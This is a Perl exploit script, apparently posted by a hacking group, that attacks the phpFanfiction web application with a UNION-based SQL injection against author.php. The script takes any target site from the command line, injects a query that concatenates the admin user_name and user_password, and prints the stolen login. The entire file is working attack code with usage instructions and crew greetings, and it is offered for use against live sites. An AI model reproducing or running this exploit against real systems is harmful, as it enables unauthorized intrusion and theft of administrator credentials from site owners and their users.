#!/usr/bin/perl
#**********************************************************#
#phpFanfiction [Remote SQL injection]
#**********************************************************#
#Greetz
#www.MainHack.com - www.ServerIsDown.org - www.sux0r.net
#VOP Crew [Vaksin13 * OoN_Boy * Paman]
#R3VAN_BASTARD * Kecemplungkalen * eminem * [S]hiro *
#zxvf * Pizzyroot * iwannine
#Jupe Crew [makasih buat ngenet gratisnya wkwkwk]
#*********************************************************#

use HTTP::Request;
use LWP::UserAgent;

$bug = "author.php?id=-1";
$sql = "+union+select+1,2,3,4,concat(0x21,user_name,0x3a,user_password,0x21),6,7 from+user+where+user_id=1--";

print "\n ************************************************\n";
print " *     	phpFanfiction [Remote SQL injection]	*\n";
print " *		disclosure by S3T4N 	   	*\n";
print " *	 	  sux0r.net			*\n";
print " ************************************************\n\n";

if (@ARGV != 1) { &help; exit(); }

sub help(){
	print " [?] Use : perl $0 www.target.com\n";
	print "           perl $0 www.target.com/path\n\n";
}

if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; }
print " [SQL] Exploiting ...\n\n";

my $injection = $target.$bug.$sql;
my $request   = HTTP::Request->new(GET=>$injection);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);
if ($response->is_success) {
	my $res   = $response->content;
	if ($res =~ m/!(.*):(.*)!/g) {
		my ($username,$passwd) = ($1,$2);
		print " [target] $target \n";
		print " [loginx] $username:$passwd \n\n";
	}
	else { print " [SQL] Error, Fail to get admin login.\n\n"; }
}
else { print " [SQL] Error, ".$response->status_line."\n\n"; }